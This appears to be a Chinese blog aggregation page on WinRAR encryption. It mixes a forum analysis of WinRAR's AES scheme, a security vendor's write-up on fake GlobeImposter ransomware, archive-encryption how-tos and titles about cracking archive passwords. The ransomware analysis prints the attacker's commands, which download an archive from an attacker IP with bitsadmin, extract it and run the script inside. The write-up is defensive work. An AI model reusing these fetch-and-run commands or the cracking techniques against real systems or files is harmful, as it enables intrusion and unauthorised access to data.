精华内容
下载资源
问答
  • 完美破解winrar加密的软件完美破解winrar加密的软件完美破解winrar加密的软件
  • 调用WinRAR加密压缩文件源码,多个文件压缩成一个
  • 不要密码直接提取WINRAR加密文件 不要密码直接提取WINRAR加密文件 不要密码直接提取WINRAR加密文件
  • 除了用来压缩文件,我们还常常把WinRAR当作一个加密软件来使用,在压缩文件的时候设置一个密码就可以达到保护数据的目的了。正因为如此,专门针对WinRAR密码的破解...那么,怎样才可以让WinRAR加密的文件牢不可破呢?
  • 无需密码-直接提取WINRAR加密文件
  • winrar加密分析

    千次阅读 2010-12-11 17:49:00
    【原创】winrar加密分析标 题: winrar加密分析 作 者:天易love 时 间: 2009-10-02,06:33:10 链 接: http://bbs.pediy.com/showthread.php?t=98812<br /><br />条件限制,用非智能手机发的,因而无法...
    【原创】winrar加密分析
    天易love 当前在线

    标 题: winrar加密分析
    作 者: 天易love
    时 间: 2009-10-02,06:33:10
    链 接: http://bbs.pediy.com/showthread.php?t=98812

    条件限制,用非智能手机发的,因而无法图文并貌,请大家包涵。
    一、加密文件大体结构:
        1、只加密文件内容时。偏移14-15h是对其后一直到文件头结束处也就是加密数据开始处的校验值。文件头中文件名后至文件头结束处是八字节的salt和5字节的未知区域(功能暂不详),加密数据后紧跟固定的结束字符串c4 3d 7b 00 40 07 00。
        2、头和内容均加密时:偏移14-15h是salt2,尾部还出现一次。紧跟的是加密的文件头(头中尾部是salt1和5字节的未知区域)和加密的文件内容(压缩后再进行aes加密),最后就是salt2和经过aes加密的固定结束字符串。注:生成salt的函数调用了2次。

        二、简述salt算法:
         1、由SystemTime得到FileTime;
            2、分别对FileTime的两个DWORD进行hash_process;
         3、hash_final后得到的digest的最前面的两个DWORD就是salt。
    三、加密过程:
        1、先将salt接在unicode形式的密码后再用hash_final生成aesinit、aeskey、10轮round key。
       2、压缩好的文件内容分组长为每一个分组128bit,开始加密前先与前一个分组xor生成一个state参与aes加密,第一个分组与aesinit进行xor。
        四、隐患:
        由于salt是随机产生,因而aeskey和round key也是随机的,文件加密结果就是随机的。这个变量的使用给我们提供了利用空间。插一句,假如由加密后数据逆推得到aeskey但由于是经过hash得到,这是不可逆的,所以不可能知道密码。唯一可行就是让其加密过程中自己将密码保存到salt处最好用可逆向的加密算法处理一下,这不会有任何影响,只是让它多了层含义。
       以上是我的一点肤浅的认识,望批评指正!
     天易love
     2009-10-2
    展开全文
  • winrar加密压缩

    2018-09-07 09:59:58
    右击选择添加到压缩文件,


    右击选择添加到压缩文件,



    806983cc2b7c61694f471ea9efeeff5eeff5377e

    展开全文
  • 令人惊叹的是,这个所谓的“勒索病毒”执行极为简单,只是利用WinRAR加密压缩用户文件,之后再将一封GlobeImposter的勒索消息邮件修改后恐吓用户,通过邮箱联系索取酬金。腾讯安全提醒大家,如遇到此病毒,不要着急...

    近日,腾讯安全御见威胁情报中心发现假冒GlobeImposter勒索病毒正在传播,攻击者疑通过MS SQL爆破入侵服务器,通过网络下载恶意脚本代码,继而执行加密和勒索流程。

    令人惊叹的是,这个所谓的“勒索病毒”执行极为简单,只是利用WinRAR加密压缩用户文件,之后再将一封GlobeImposter的勒索消息邮件修改后恐吓用户,通过邮箱联系索取酬金。腾讯安全提醒大家,如遇到此病毒,不要着急着缴纳赎金。该病毒加密压缩的密码明文写在病毒配置信息中,使用这个密码解压缩,文件就能完全恢复。

    分析

    被勒索服务器疑似被通过MSSQL爆破入侵成功,之后执行以下相关命令行进一步下载执行恶意代码:PHP大马

    1)bitsadmin  /transfer n hxxp://47.92.55[.]239/s/jr26.rar C:/Progra~1/jr26.rar

    2)C:\Windows\system32\cmd.exe /c C:\Progra~1\winrar\rar.exe e -pp.5p C:\Progra~1\jr26.rar

    3)C:\Windows\system32\cmd.exe /c C:\Progra~1\jr26.cmd

    jr26.rar为一个带密码的压缩包,密码为p.5p

    WinRAR加密压缩冒充GlobeImposter勒索病毒 安全专家轻松解密

    jr26.rar解压后可得到一个疑似乱码的脚本文件

    WinRAR加密压缩冒充GlobeImposter勒索病毒 安全专家轻松解密

    16进制查看可发现貌似多了0xFF 0xFE 0x0D 0x0A,目测应该是以二进制形式写入的标志,导致文本类识别工具无法查看

     

    WinRAR加密压缩冒充GlobeImposter勒索病毒 安全专家轻松解密

    去掉0xFF 0xFE 0x0D 0x0A后尝试再次打开,脚本内容已可以正常查看

     

    WinRAR加密压缩冒充GlobeImposter勒索病毒 安全专家轻松解密

    查看脚本内容可知,主要目的为将指定类型的文件根据后缀分类,分别使用winrar进行加密压缩(通过上图的命令行参数,我们看到加密密码为lll.hc3t6b9s8kz5r26),文件将被压缩至根目录下对应的不同文件名(邮箱.ch_文件后缀类型.随机数字tiger88818)包内,同时删除原始文件。

     

    WinRAR加密压缩冒充GlobeImposter勒索病毒 安全专家轻松解密

    如下图Decryptcn@protonmail.ch_bax.32419tiger88818包内,则被带密码压缩了所有bak类型的文件

     

    WinRAR加密压缩冒充GlobeImposter勒索病毒 安全专家轻松解密

     

    同时,为了防止加密压缩时,数据库文件被占用导致加密中止,病毒还会结束大量的数据库服务相关进程。

     

    WinRAR加密压缩冒充GlobeImposter勒索病毒 安全专家轻松解密

    最奇葩的来了,加密文件完成后,病毒会通过远程下载一个勒索说明文档

     

    WinRAR加密压缩冒充GlobeImposter勒索病毒 安全专家轻松解密

    打开说明文档,竟然是知名勒索病毒GlobeImposter的修改版本,该病毒作者只是修改了联系邮箱。奇热影视

     

    WinRAR加密压缩冒充GlobeImposter勒索病毒 安全专家轻松解密

     

     

    进一步观察病毒使用的url可发现攻击者使用的多个文件,分别有勒索说明文档(HOW_TO_BACK_YOUR_FILE*),勒索脚本包(jr26.rar),正规的winrar压缩模块(Rar.exe),猜测为扫描器相关模块包(带未知密码的s.rar包),且病毒使用服务部署在某知名云平台服务器上。

     

    WinRAR加密压缩冒充GlobeImposter勒索病毒 安全专家轻松解密

     

     

     

    WinRAR加密压缩冒充GlobeImposter勒索病毒 安全专家轻松解密

    腾讯安全提醒大家,针对此病毒,可以不必着急缴纳赎金,可尝试使用Winrar打开根目录中的*tiger88818后缀文件,然后选择使用密码(lll.hc3t6b9s8kz5r26)解压到指定位置,即可恢复文件。

     

    WinRAR加密压缩冒充GlobeImposter勒索病毒 安全专家轻松解密

     

     

    WinRAR加密压缩冒充GlobeImposter勒索病毒 安全专家轻松解密

    安全建议

    企业用户:

    1、尽量关闭不必要的端口,如:445、135,139等,对3389,5900等端口可进行白名单配置,只允许白名单内的IP连接登陆;

    2、尽量关闭不必要的文件共享,如有需要,请使用ACL和强密码保护来限制访问权限,禁用对共享文件夹的匿名访问;

    3、采用高强度的密码,避免使用弱口令密码,并定期更换密码。建议服务器密码使用高强度且无规律密码,并且强制要求每个服务器使用不同密码管理;

    4、对没有互联需求的服务器/工作站内部访问设置相应控制,避免可连外网服务器被攻击后作为跳板进一步攻击其他服务器;

    5、对重要文件和数据(数据库等数据)进行定期非本地备份;

    6、教育终端用户谨慎下载陌生邮件附件,若非必要,应禁止启用Office宏代码;

    7、在终端/服务器部署专业安全防护软件,Web服务器可考虑部署在腾讯云等具备专业安全防护能力的云服务;

    WinRAR加密压缩冒充GlobeImposter勒索病毒 安全专家轻松解密

     

    8、建议全网安装御点终端安全管理系统(https://s.tencent.com/product/yd/index.html)。御点终端安全管理系统具备终端杀毒统一管控、修复漏洞统一管控,以及策略管控等全方位的安全管理功能,可帮助企业管理者全面了解、管理企业内网安全状况、保护企业安全。

    个人用户:

    1、启用腾讯电脑管家,勿随意打开陌生邮件,关闭Office执行宏代码;

    2、打开电脑管家的文档守护者功能,利用磁盘冗余空间自动备份数据文档,即使发生意外,数据也可有备无患。

    IOCs

    MD5:

    36e826b4a06dcbf039fb8fd6aeca4836

    e9613db5620dbcb56903b98532971582

    f18b3b2dc6556d60663d70ac411c0ac8

    URL
    hxxp://47.92.55.239/s/HOW_TO_BACK_YOUR_FILES.txt
    hxxp://47.92.55.239/s/HOW_TO_BACK_YOUR_FILESxx.rar
    hxxp://47.92.55.239/s/jr26.rar
    hxxp://47.92.55.239/s/Rar.exe
    hxxp://47.92.55.239/s/s.rar

    展开全文
  • WinRAR加密压缩文件

    千次阅读 2006-07-25 20:33:00
     假如要加密下面两个已选中的文件: 两个文件都选中后右键单击, 在弹出菜单中选择【添加到压缩文件(A)…】, 出现下面的界面,在文件名输入的地方输入需要的名字,如果要选择其他路径也可以单击【浏览(B)…】...
    注:加密务必牢记自己的密码,暂时没有有效的解密办法,密码忘记等于文件丢失。
            假如要加密下面两个已选中的文件:

            两个文件都选中后右键单击,

            在弹出菜单中选择【添加到压缩文件(A)…】, 出现下面的界面,在文件名输入的地方输入需要的名字,如果要选择其他路径也可以单击【浏览(B)…】来选择加密压缩后保存的位置。 

            选择【高级】选项卡,

            单击【设置密码(P)…】, 在弹出窗口中输入你要设置的密码,选中了【□显示密码(S) 】时你输入的密码则 
    不再显示为“*”而是以明文显示,如果不想让其他人看见你的加密的文件的文件名,请勾选【□加密文件名(N) 】。  
            完成后点击【确定】返回上级界面,继续【确定】文件开始加密压缩了。  
            加密压缩完成后的文件存放在你指定的位置,如果没有制定则和原来的文件在同一目录下。
     

    展开全文
  • 2007-08-05 09:31 汉字密码 经常使用WinRAR的朋友都知道,WinRAR除了用来压缩或解压缩文件外,还可以当作加密软件来使用。一般情况下我们都是输入英文字母、数字或其他特殊符号为密码,不知道你是否想过使用汉字作为...
  • WINRAR压缩加密

    2013-07-16 22:07:08
    WINRAR压缩加密
  • 利用winrar安全加密

    2011-08-01 06:26:24
    利用winrar加密很容易,但是如果方法不当还是不安全的,例如密码字符个数过少,字符过于常用,尤其是只使用数字更是危险,破解者不用费多大力气就可以破解了。  要实现安全加密也很容易,只要增加密码字符个数即可...
  • WinRAR压缩加密

    2012-08-27 15:57:19
    很多情况下,我们都想对自己的文档或照片以及其他文件进行加密,这里告诉大家一个简单的方法,就是采用WinRAR压缩软件进行加密加密前: 加密后:   工具/原料  WinRAR压缩软件 测试文档 xp...
  • 主要介绍了C#中使用WinRAR实现加密压缩及解压缩文件,本文直接给出实例代码,代码中包含详细注释,需要的朋友可以参考下
  • VB6利用WinRAR进行压缩解压,支持加密
  • 当一个非常重要的RAR文件因为忘记密码无法解压缩时,可以使用RAR Password Cracker这个软将加密的RAR文件破解出来。文中介绍了使用RAR Password Cracker Wizard强行破解加密WinRAR文件的方法。
  • 赛迪网安全社区 CNETNews.com.cn 2007-10-27 16:03:44  (摘自 http://www.cnetnews.com.cn/2007/1027/584661.shtml) 常用WinRAR来压缩各类文件的朋友是否知道,除了压缩文件,WinRAR还完全可以当作一个加密软件来...
  • WinRAR压缩加密的做法

    2013-12-27 14:37:01
    必须是安装有WinRAR压缩软件的电脑。我的操作系统为windows xp。 选取一个测试文档,在里面放有一个文本文件。 右键选取这个文件夹,选择【添加到压缩文件】。 出现
  • C# 利用WinRAR (加密)压缩及解压缩 相关文件夹及文件
  • 当一个非常重要的RAR文件因为忘记密码无法解压缩时,你是不是就这样抛弃它了呢?当然不是,你可以使用RAR Password Cracker这个软将加密的RAR文件破解出来。本文将为大家介绍如何强行破解加密WinRAR文件。
  • 很好用的文件资源,可以实现调用WinRar进行文件加密压缩和解压缩,但系统需要有WinRar哦!
  • 巧妙地使用WINRAR进行的一些简单的数据加密方法。
  • 备份Access 数据库并用WinRar压缩加密

    千次阅读 2006-03-03 20:53:00
    {Alvin Ye 叶冬开keywork : Access 数据库 备份 winexec winrar 压缩 加密 }unit uBak;interfaceuses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, StdCtrls,FileCtrl...
  • WinRAR自动给文件加密

    2008-03-23 23:06:00
    有没有更好的办法呢?当然有了!我们可以通过简单的设置,... 运行WinRAR后,选择菜单栏中的“选项→设置”,在“设置”窗口中选择“压缩选项 ”,点击上面的“创建默认配置”按钮。在随后打开的窗口中选择“高级”,点
  • 破解zip,WinRaR等压缩包加密

    千次阅读 2020-10-14 16:58:08
    有时候我们下载网上的压缩包,压缩包被别人加密了,这时候,我们可以使用下面的方式进行破解(命令解压) 这里我推荐使用7z,7z很强大,而且免费开源。https://www.7-zip.org/download.html下载安装文件exe ...
  • C# 利用WinRAR (加密)压缩及解压缩 相关文件夹及文件 (来自http://www.cnblogs.com/freeliver54/archive/2007/01/17/622992.html) 本次示例主要实现:1.压缩文件夹及其下文件2.压缩文件夹下文件3.压缩文件夹...
  •  现在使用WinRAR加密与平时使用WinRAR加密,操作上没什么两样,只是在设定密码的取值范围为:中文、日文、其它全角特殊符号等,只要您能想到的,都能把它输进去。  首先,将您设置好的密码保存于一个文本文件里...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 4,248
精华内容 1,699
关键字:

winrar如何加密